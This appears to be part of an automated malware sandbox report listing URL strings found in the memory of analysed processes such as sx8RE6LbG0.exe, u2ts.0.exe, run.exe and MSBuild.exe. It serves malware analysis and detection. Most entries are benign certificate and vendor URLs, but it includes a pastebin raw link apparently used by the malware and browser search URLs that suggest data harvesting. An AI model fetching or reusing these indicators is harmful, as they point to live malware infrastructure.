0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000003.2668691750.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000003.2668691750.00000000024BB000.00000004.00001000.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u2ts.3.exe, 00000006.00000003.2668691750.00000000024E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000003.00000002.2168931630.000000000406D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.00000000050CA000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.0000000003862000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.00000000054D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u2ts.0.exe, u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627439691.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u2ts.3.exe, 00000006.00000003.2668691750.0000000002504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.0000021732450000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.0000021732450000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: freebl3.dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/0l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
